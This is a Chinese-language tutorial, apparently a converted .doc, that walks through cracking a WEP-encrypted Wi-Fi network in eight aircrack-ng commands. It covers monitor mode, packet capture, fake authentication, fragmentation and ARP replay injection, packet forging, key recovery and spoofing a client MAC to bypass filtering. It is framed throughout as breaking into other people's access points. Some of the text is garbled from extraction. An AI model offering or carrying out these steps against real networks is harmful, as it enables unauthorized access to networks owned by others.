
八条命令完成无线网破解过程.doc
5页1八条命令完成破解过程八条命令完成破解过程1、ifconfig -a查看无线网卡名字及 MAC 地址记录下来 如下面 rausb0,TP-LINK WN321G 就是这个了 如果是 Athose 的无线网卡显示的就是 ath1,有的无线网卡如果没看到有无线网卡,可以使用 iwconfig 命令,查看是否有加载2、airmon-ng start rausb0 6这个命令用于将自己的无线网卡置于监控模式,即类似一个 AP 的效果,因此 可以有抓别人包的功能 其中 rausb0 是无线网卡名字的 ,在第一个 ifconfig -a 命令可以看得到 rausb0 后面的那个 6 是需要破解的 AP 的频道,可以在最前面的图上看到,或 者是在 windows 下先把要破解对象的相关信息抄下来 运行命令成功以后,你会看到返回的提示显示出现一个 rausb0(如果你是 TP- LINK WN321G 无线网卡的话就是这个,其他的可能不同,不过一般都是 XXX1)3、airodump-ng --ivs -w pack -c 6 rausb0这个命令会列出所有该频道的 AP 其中,6 是指你需要监控的频道,必须和第二个命令里的一样,rausb0 是刚才 第二步出现的网卡名字。
这个命令运行以后,显示的内容比较多,简单介绍一下: BSSID :是 AP 的 Mac 地址 PWR: AP 信号的大小,如果低于 10,丢包情况严重,比较难破解 RXQ: 干扰的大小 Beacons:发送接受的包,参考信息,在跳说明有数据 #Data:这个比较重要,是接受到可以用来破解的特殊包,如果一直不变,那么, 说明没有客户端连接,破解可能很麻烦,如果对方有大文件在下载,那么这个 跳的速度非常快,几分钟就可以有足够的包来破解了,如果跳得很慢,那么, 就需要用注入的方式来获取包了 CH:频道 MB:网络连接速度 54 就是 54MB ENC, CIPHER,AUTH 这些是加密方式,我们这次只讨论显示为 WEP 如果显示 WPA TKIP 啥的,只能密码穷举破解,个人认为希望不大 ESSID: 这个是 AP 的名字,需要用到的如果是中文的话可以下载一个中文 包, 过一会儿,下面会显示哪些客户端连接到了哪些 AP,针对有些 Mac 地址加密 的,很容易模拟对方客户端的 Mac 从而骗进去,所以不要简单地相信 Mac 限制2功能 这个窗口就开着好了,不用关闭,以后的命令,需要重新打开一个终端窗口 (shell)操作4、aireplay-ng -1 0 -e ap_essid -a ap_mac -h pc_mac rausb0这一步开始,我们要做一些真正的破解工作,主要是针对那些客户端仅仅连接, 没什么流量的 AP,这种 AP,#Data 的增长非常慢,往往需要很长的时间才有 可能取得足够的包(一般 5 位的密码需要 10000 个包左右,更多的密码就要更 多的。
)这个时候就需要 aireplay-ng 出面了,顾名思义,这个软件就是 Replay,也就是说,模拟发包首先解释命令: -e ap_essid 就是 -e 之后加上你需要破解的 ESSID,比如 TP-LINK , linksys,注意大小写 -a ap_mac 就是 -a 之后加上你需要破解的 AP 的 Mac 地址,上面的图就可以看 得到 BSSID -h pc_mac 就是 -h 之后,加上你的无线网卡的 Mac 地址, 在第一步你可以得 到 rausb0 ,上面解释过了 举个例子: aireplay-ng -1 0 -e Tp-link -a 001900123456 -h 001900345678 rausb0 这一条命令,是用欺骗的方式,连接上那个 AP,因此,如果网络信号不好,可 能会执行不成功 如果成功了,那么会显示 Successful :-] 字样否则,让信号强度大于 105、aireplay-ng -5 -b ap_mac -h pc_mac rausb0上一条成功以后,我们需要开始收集那些需要的数据包,才能够进行模拟,并 且破解所谓的需要的数据包,就是 #Data 的数据,如果 #Data 一直是 0,那 么可能会很麻烦,最好的情况是 #Data 缓慢增长的这种情况。
解释一下 -b ap_mac 就是你需要破解的 AP 的 Mac 地址 -h pc_mac 就是你自己网卡的 Mac 地址 rausb0 就是你自己网卡名字同上面一样这一条命令的执行,和#data 包有关,如果#Data 没有增加,则这个命令会一直 执行,直到捕获一个#Data 包 捕获以后,程序会问你是否需要用这个包来模拟攻击回答 Y 即可 如果攻击成功,则会显示成功,失败往往是因为信号太差造成的,如果攻击失 败(往往是捕获的包有问题) ,程序重试 N 次以后,或自动重新开始捕捉包, 继续进行即可3等成功完成以后,会显示一个文件名:fragment-XXXXX-XXXXXX.xor 这个文件名,XXXXX 里面是数字,是一个文件下一部会用得到这一步是最有可能失败的一步,尽量保持信号好一点6、packetforge-ng -0 -a ap_mac -h pc_mac -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp第六步,参数比较多,解释一下: -a ap_mac 是待破解的 AP 的 Mac 地址, -h pc_mac 是你自己的无线网卡 Mac 地址 fragment-XXXXX-XXXXXX.xor 就是上一步显示的那个文件名。
这一步会很快做完, 显示生成文件到 mrarp 啥的,其实就是破解包的准备过 程 对了这里的-l 是字母不是数字 17、aireplay-ng -2 -r mrarp -x 256 rausb0这一步没哈可以修改的,参数解释一下 rausb0 是 你的无线网卡的名字 256 是攻击速度,1024 是最大值,个人建议设为 256 ,或 128 这样不容易死掉这一步执行后,你会看到第一个终端窗口(shell)里面,你破解的那个 AP 后面的 #Data 在飞速增长,我们只需等待十几秒数据包就冲到 5 位数字以上了如果 第一个终端窗口(shell)里面的#Data 没有在飞速增长的话那就是你操作时出了错 误8、我们可以新打开一个终端窗口,当 #Data 达到 10000 个的时候,就可以测试破解了,很多密码都可以 10000 左右#Data 就算出来 新窗口中运行:aircrack-ng -n 64 -b ap_mac pack-01.ivs解释一下, 64 AP 使用的是 64 位加密,如果是 128 的话把 64 改成 128 -b ap_mac 对方 AP 的 Mac 地址 pack-01.ivs 其实是第三步自动生成的一个文件, 如果你多次运行了第三步, 那么,可能会生成多个 pack-XX.ivs 文件,你可以到对应的文件夹里看一下 (就在桌面上的第一个文件夹图标里) ,找到 XX 最大的那个,就是你当前正在 使用的这个文件。
运行以后,如果运气好,一般 10000 个#Data 就可以破解出来密码,同时会显4示对应的 Ascii 码,如果不是标准 Ascii 码就是一串数字,记录下来,搞事实上运气不好的情况,程序继续等待更多的#Data,再重新计算一次密码例如例如1.在在 shell 窗口中输入窗口中输入 ifconfig 命令命令 ,出现如下信息:lo no wireless extensions.eth0 no wireless extensions.eth1 IEEE 802.11g ESSID:““ Nickname:““Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-95 dBm Noise level=-95 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:02.找出你的无线网卡名字找出你的无线网卡名字,我这里是 eth1.再启动你的网卡为 Moniter 模式(输入 airmon-ng start eth1 11)。
再输入 ifconfig 命令 ,返回如下信息:lo no wireless extensions.eth0 no wireless extensions.eth1 IEEE 802.11g ESSID:““ Nickname:““Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-95 dBm Noise level=-95 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:03. 输入命令输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.命令中的 11 表示要破解的频道号,bssid 后面的数字表示破解目标的 MAC 物理地址,outputs表示要生成的包的名称。
回车运行4.再开一个再开一个 shell 输入输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2 前面已解释过是指目标 MAC 物理地址,00:A1:C1:D8:A5:B6 表示本机网卡 MAC 物理地址5.再开一个再开一个 shell 输入输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1获取更多的数据包6.返回数据量到返回数据量到 1 万的时候就可以破解了万的时候就可以破解了再开一个 shell 输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解如果破解不成功,让它继续抓包,直到破解5在破解过程中遇到些问题和大伙说说 1、开始用的在 VMwareV5.5.2 虚拟机中文绿色版下用 BT3 破解,第二次使用时 找不到 USB 网卡这时需要先运行“启动服务.cmd”启动-USB 和 COM 服务。
再开虚拟机才又找得到 USB 网卡 2、发现在 VMwareV5.5.2 虚拟机中文绿色版里会破解出密码,运行最后一条命 令时出现:killed 提示绿色版的某些功能可能无法正常使用或者说绿色版不稳 定建议用光盘启动或 usb 启动要不就用 VMware 完全安。
